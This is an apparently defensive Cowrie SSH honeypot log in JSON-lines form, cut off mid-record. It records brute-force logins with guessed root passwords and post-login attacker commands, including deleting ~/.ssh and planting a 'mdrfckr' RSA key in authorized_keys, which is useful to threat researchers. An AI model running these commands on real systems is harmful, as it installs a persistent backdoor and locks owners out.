{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:49:23.445480Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:49:23.446146Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:49:23.589129Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:23.590369Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":34318,"dst_ip":"1.2.3.4","dst_port":22,"session":"523cb73068e5","protocol":"ssh","message":"New connection: 5.202.105.236:34318 (1.2.3.4:22) [session: 523cb73068e5]","sensor":"my-vps","timestamp":"2025-09-09T00:49:24.727675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:24.743305Z","src_ip":"5.202.105.236","session":"523cb73068e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:24.881321Z","src_ip":"5.202.105.236","session":"523cb73068e5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:49:25.451113Z","src_ip":"5.202.105.236","session":"523cb73068e5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:26.596122Z","src_ip":"5.202.105.236","session":"523cb73068e5"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":35080,"dst_ip":"1.2.3.4","dst_port":22,"session":"37ec7c0374f3","protocol":"ssh","message":"New connection: 5.202.105.236:35080 (1.2.3.4:22) [session: 37ec7c0374f3]","sensor":"my-vps","timestamp":"2025-09-09T00:49:26.743471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:26.745095Z","src_ip":"5.202.105.236","session":"37ec7c0374f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:26.876131Z","src_ip":"5.202.105.236","session":"37ec7c0374f3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:49:27.496843Z","src_ip":"5.202.105.236","session":"37ec7c0374f3"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:27.641041Z","src_ip":"5.202.105.236","session":"37ec7c0374f3"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:27.644819Z","src_ip":"5.202.105.236","session":"dcb23835aa21"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":38858,"dst_ip":"1.2.3.4","dst_port":22,"session":"977949be6ace","protocol":"ssh","message":"New connection: 152.32.129.236:38858 (1.2.3.4:22) [session: 977949be6ace]","sensor":"my-vps","timestamp":"2025-09-09T00:49:40.191738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:40.192658Z","src_ip":"152.32.129.236","session":"977949be6ace"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:40.392133Z","src_ip":"152.32.129.236","session":"977949be6ace"}
{"eventid":"cowrie.login.failed","username":"boris","password":"pass","message":"login attempt [boris/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:49:41.231607Z","src_ip":"152.32.129.236","session":"977949be6ace"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:42.432457Z","src_ip":"152.32.129.236","session":"977949be6ace"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":38133,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5ebc1d24196","protocol":"ssh","message":"New connection: 103.100.209.195:38133 (1.2.3.4:22) [session: f5ebc1d24196]","sensor":"my-vps","timestamp":"2025-09-09T00:49:47.400791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:47.401424Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:47.604397Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@1234567","message":"login attempt [root/Aa@1234567] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:49:48.466274Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:49:48.930129Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:49:48.930826Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:49:48.931936Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:49.144625Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:49:49.614426Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:49:49.615179Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:49:49.823554Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:49.824474Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":38700,"dst_ip":"1.2.3.4","dst_port":22,"session":"913970f2658f","protocol":"ssh","message":"New connection: 103.100.209.195:38700 (1.2.3.4:22) [session: 913970f2658f]","sensor":"my-vps","timestamp":"2025-09-09T00:49:50.022104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:50.027370Z","src_ip":"103.100.209.195","session":"913970f2658f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:50.229704Z","src_ip":"103.100.209.195","session":"913970f2658f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:49:51.046947Z","src_ip":"103.100.209.195","session":"913970f2658f"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:52.256822Z","src_ip":"103.100.209.195","session":"913970f2658f"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":39185,"dst_ip":"1.2.3.4","dst_port":22,"session":"54399f27551c","protocol":"ssh","message":"New connection: 103.100.209.195:39185 (1.2.3.4:22) [session: 54399f27551c]","sensor":"my-vps","timestamp":"2025-09-09T00:49:52.449517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:49:52.455004Z","src_ip":"103.100.209.195","session":"54399f27551c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:49:52.652396Z","src_ip":"103.100.209.195","session":"54399f27551c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:49:53.463842Z","src_ip":"103.100.209.195","session":"54399f27551c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:53.668552Z","src_ip":"103.100.209.195","session":"54399f27551c"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:49:53.675527Z","src_ip":"103.100.209.195","session":"f5ebc1d24196"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":43508,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6ff93fd27e1","protocol":"ssh","message":"New connection: 43.156.132.147:43508 (1.2.3.4:22) [session: f6ff93fd27e1]","sensor":"my-vps","timestamp":"2025-09-09T00:50:00.884813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:50:00.886144Z","src_ip":"43.156.132.147","session":"f6ff93fd27e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:50:01.131965Z","src_ip":"43.156.132.147","session":"f6ff93fd27e1"}
{"eventid":"cowrie.login.failed","username":"operator","password":"123456","message":"login attempt [operator/123456] failed","sensor":"my-vps","timestamp":"2025-09-09T00:50:02.156892Z","src_ip":"43.156.132.147","session":"f6ff93fd27e1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:50:03.405272Z","src_ip":"43.156.132.147","session":"f6ff93fd27e1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:50:09.483872Z","src_ip":"212.227.235.229","session":"19592570bbd8"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":58808,"dst_ip":"1.2.3.4","dst_port":22,"session":"065fd0df1013","protocol":"ssh","message":"New connection: 51.250.72.176:58808 (1.2.3.4:22) [session: 065fd0df1013]","sensor":"my-vps","timestamp":"2025-09-09T00:50:14.540155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:50:14.541116Z","src_ip":"51.250.72.176","session":"065fd0df1013"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-